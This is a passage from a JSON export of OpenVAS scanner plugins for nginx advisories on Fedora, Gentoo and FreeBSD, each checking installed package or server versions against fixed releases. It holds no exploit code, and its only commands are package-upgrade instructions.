rpm:\"nginx-debuginfo~0.7.64~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "description": "The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12782.", "modified": "2017-07-10T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:66451", "href": "http://plugins.openvas.org/nasl.php?oid=66451", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-12782 (nginx)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12782.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12782 (nginx)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Dec 4 2009 Jeremy Hinegardner - 0.7.64-1\n- update to 0.7.64\n* Thu Oct 29 2009 Jeremy Hinegardner - 0.7.63-1\n- update to 0.7.63\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update nginx' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12782\";\ntag_summary = \"The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12782.\";\n\n\n\nif(description)\n{\n script_id(66451);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-2629\", \"CVE-2009-3555\", \"CVE-2009-3896\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-12782 (nginx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539573\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"nginx\", rpm:\"nginx~0.7.64~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nginx-debuginfo\", rpm:\"nginx-debuginfo~0.7.64~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "description": "The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12750.", "modified": "2018-04-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:136141256231066449", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066449", "type": "openvas", "title": "Fedora Core 12 FEDORA-2009-12750 (nginx)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12750.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12750 (nginx)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Dec 4 2009 Jeremy Hinegardner - 0.7.64-1\n- Update to new stable 0.7.64\n* Thu Oct 29 2009 Jeremy Hinegardner - 0.7.63-1\n- Update to new stable 0.7.63\n- reinstate zlib dependency\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update nginx' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12750\";\ntag_summary = \"The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12750.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66449\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-3555\", \"CVE-2009-3896\", \"CVE-2009-2629\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 12 FEDORA-2009-12750 (nginx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539573\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"nginx\", rpm:\"nginx~0.7.64~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nginx-debuginfo\", rpm:\"nginx-debuginfo~0.7.64~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555", "CVE-2009-2629", "CVE-2009-3896"], "description": "The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12775.", "modified": "2018-04-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:136141256231066450", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066450", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-12775 (nginx)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12775.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12775 (nginx)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Dec 4 2009 Jeremy Hinegardner - 0.7.64-1\n- update to 0.7.64\n* Thu Oct 29 2009 Jeremy Hinegardner - 0.7.63-1\n- update to 0.7.63\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update nginx' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12775\";\ntag_summary = \"The remote host is missing an update to nginx\nannounced via advisory FEDORA-2009-12775.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66450\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-2629\", \"CVE-2009-3555\", \"CVE-2009-3896\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 10 FEDORA-2009-12775 (nginx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539573\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"nginx\", rpm:\"nginx~0.7.64~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nginx-debuginfo\", rpm:\"nginx-debuginfo~0.7.64~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3898", "CVE-2009-3555", "CVE-2011-4315", "CVE-2009-3896", "CVE-2012-1180"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-22.", "modified": "2017-07-07T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:71308", "href": "http://plugins.openvas.org/nasl.php?oid=71308", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-22 (nginx)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been found in nginx, the worst of\n which may allow execution of arbitrary code.\";\ntag_solution = \"All nginx users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/nginx-1.0.14'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-22\nhttp://bugs.gentoo.org/show_bug.cgi?id=293785\nhttp://bugs.gentoo.org/show_bug.cgi?id=293786\nhttp://bugs.gentoo.org/show_bug.cgi?id=293788\nhttp://bugs.gentoo.org/show_bug.cgi?id=389319\nhttp://bugs.gentoo.org/show_bug.cgi?id=408367\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201203-22.\";\n\n \n \nif(description)\n{\n script_id(71308);\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cve_id(\"CVE-2009-3555\", \"CVE-2009-3896\", \"CVE-2009-3898\", \"CVE-2011-4315\", \"CVE-2012-1180\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-22 (nginx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-servers/nginx\", unaffected: make_list(\"ge 1.0.14\"), vulnerable: make_list(\"lt 1.0.14\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3898", "CVE-2009-3555", "CVE-2011-4315", "CVE-2009-3896", "CVE-2012-1180"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-22.", "modified": "2018-10-12T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:136141256231071308", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071308", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-22 (nginx)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201203_22.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71308\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cve_id(\"CVE-2009-3555\", \"CVE-2009-3896\", \"CVE-2009-3898\", \"CVE-2011-4315\", \"CVE-2012-1180\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-22 (nginx)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been found in nginx, the worst of\n which may allow execution of arbitrary code.\");\n script_tag(name:\"solution\", value:\"All nginx users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/nginx-1.0.14'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-22\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=293785\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=293786\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=293788\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=389319\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=408367\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201203-22.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-servers/nginx\", unaffected: make_list(\"ge 1.0.14\"), vulnerable: make_list(\"lt 1.0.14\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2017-07-02T21:14:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3896"], "description": "The 'nginx' program is prone to a buffer-overflow vulnerability\nbecause the application fails to perform adequate boundary checks on\nuser-supplied data.\n\nAttackers can exploit this issue to execute arbitrary code within the\ncontext of the affected application. Failed exploit attempts will\nresult in a denial-of-service condition.", "modified": "2017-01-13T00:00:00", "published": "2009-10-28T00:00:00", "id": "OPENVAS:100321", "href": "http://plugins.openvas.org/nasl.php?oid=100321", "type": "openvas", "title": "nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nginx_36839.nasl 5002 2017-01-13 10:17:13Z teissa $\n#\n# nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"The 'nginx' program is prone to a buffer-overflow vulnerability\nbecause the application fails to perform adequate boundary checks on\nuser-supplied data.\n\nAttackers can exploit this issue to execute arbitrary code within the\ncontext of the affected application. Failed exploit attempts will\nresult in a denial-of-service condition.\";\n\ntag_solution = \"Updates are available. Please see the references for more information.\";\n\nif (description)\n{\n script_id(100321);\n script_version(\"$Revision: 5002 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-13 11:17:13 +0100 (Fri, 13 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-28 11:13:14 +0100 (Wed, 28 Oct 2009)\");\n script_cve_id(\"CVE-2009-3896\");\n script_bugtraq_id(36839);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_name(\"nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/36839\");\n script_xref(name : \"URL\" , value : \"http://nginx.net/\");\n script_xref(name : \"URL\" , value : \"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=552035\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web Servers\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"nginx_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"nginx/installed\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\n\nif(!vers = get_kb_item(string(\"nginx/\", port, \"/version\")))exit(0);\nif(!isnull(vers) && vers >!< \"unknown\") {\n\n\n if(version_in_range(version:vers, test_version:\"0.7\", test_version2: \"0.7.61\") ||\n version_in_range(version:vers, test_version:\"0.6\", test_version2: \"0.6.38\") ||\n version_in_range(version:vers, test_version:\"0.5\", test_version2: \"0.5.37\") ||\n version_in_range(version:vers, test_version:\"0.4\", test_version2: \"0.4.14\")) {\n\n security_message(port:port);\n\n }\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3896"], "description": "The ", "modified": "2019-02-26T00:00:00", "published": "2009-10-28T00:00:00", "id": "OPENVAS:1361412562310100321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100321", "type": "openvas", "title": "nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nginx_36839.nasl 13859 2019-02-26 05:27:33Z ckuersteiner $\n#\n# nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:nginx:nginx\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100321\");\n script_version(\"$Revision: 13859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-26 06:27:33 +0100 (Tue, 26 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-28 11:13:14 +0100 (Wed, 28 Oct 2009)\");\n script_cve_id(\"CVE-2009-3896\");\n script_bugtraq_id(36839);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_name(\"nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/36839\");\n script_xref(name:\"URL\", value:\"http://nginx.net/\");\n script_xref(name:\"URL\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=552035\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web Servers\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"nginx_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"nginx/installed\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"The 'nginx' program is prone to a buffer-overflow vulnerability\nbecause the application fails to perform adequate boundary checks on user-supplied data.\n\nAttackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed\nexploit attempts will result in a denial-of-service condition.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version:version, test_version:\"0.7\", test_version2: \"0.7.61\") ||\n version_in_range(version:version, test_version:\"0.6\", test_version2: \"0.6.38\") ||\n version_in_range(version:version, test_version:\"0.5\", test_version2: \"0.5.37\") ||\n version_in_range(version:version, test_version:\"0.4\", test_version2: \"0.4.14\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:14:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2629"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-23T00:00:00", "published": "2009-09-15T00:00:00", "id": "OPENVAS:64894", "href": "http://plugins.openvas.org/nasl.php?oid=64894", "type": "openvas", "title": "FreeBSD Ports: nginx", "sourceData": "#\n#VID 152b27f0-a158-11de-990c-e5b1d4c882e0\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 152b27f0-a158-11de-990c-e5b1d4c882e0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, 